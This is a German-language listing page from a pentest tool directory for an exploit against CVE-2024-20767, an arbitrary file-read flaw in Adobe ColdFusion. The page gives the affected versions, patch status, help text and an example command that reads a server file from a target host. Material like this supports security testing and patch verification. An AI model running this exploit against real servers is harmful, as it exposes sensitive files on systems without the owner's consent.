Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-20767 — Exploit für CVE-2024-20767 - Adobe ColdFusion | Kitploit
Tools/GitHubGitHub/yoryio/cve-2024-20767
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubyoryio/cve-2024-20767

CVE-2024-20767

Exploit für CVE-2024-20767 - Adobe ColdFusion

Repository anzeigen
349vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-20767

CVE-2024-20767 - Beliebiger Dateisystemzugriff (Lesen) durch eine Schwachstelle bei unsachgemäßer Zugriffskontrolle in Adobe ColdFusion

  • Weitere Informationen finden Sie im Blogbeitrag von ma4ter: Adobe ColdFusion任意文件读取漏洞CVE-2024-20767分析

adobecoldfusionlogo

Betroffene Produkte und Versionen:

Tool herunterladen
ProduktBetroffene Versionen
ColdFusion 2023Update 6 und frühere Versionen
ColdFusion 2021Update 12 und frühere Versionen
  • CVSS: 8.2
  • Aktiv ausgenutzt: JA
  • Patch: JA
  • Gegenmaßnahme: NEIN

Labor

Sie können einen ColdFusion-Server mit einer kostenlosen Testversion von Adobe bereitstellen:

  • ColdFusion herunterladen

Hilfe

root@kitploit:~
usage: CVE-2024-20767.py [-h] -t TARGET [-p PORT] -c COMMAND

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Adobe ColdFusion Server URL
  -p PORT, --port PORT  Target Adobe ColdFusion Server Port, by default we use the 8500 Port
  -c COMMAND, --command COMMAND
                        Path to read file

Beispiel:

root@kitploit:~
python CVE-2024-20767.py -t http://192.168.124.203 -p 8500 -c Windows/ServerStandardEval.xml

Referenzen

  • Adobe ColdFusion任意文件读取漏洞CVE-2024-20767分析
  • CVE-2024-20767: Kritischer Adobe-ColdFusion-Fehler legt sensible Dateien offen, PoC veröffentlicht
  • Sicherheitsupdates für Adobe ColdFusion verfügbar | APSB24-14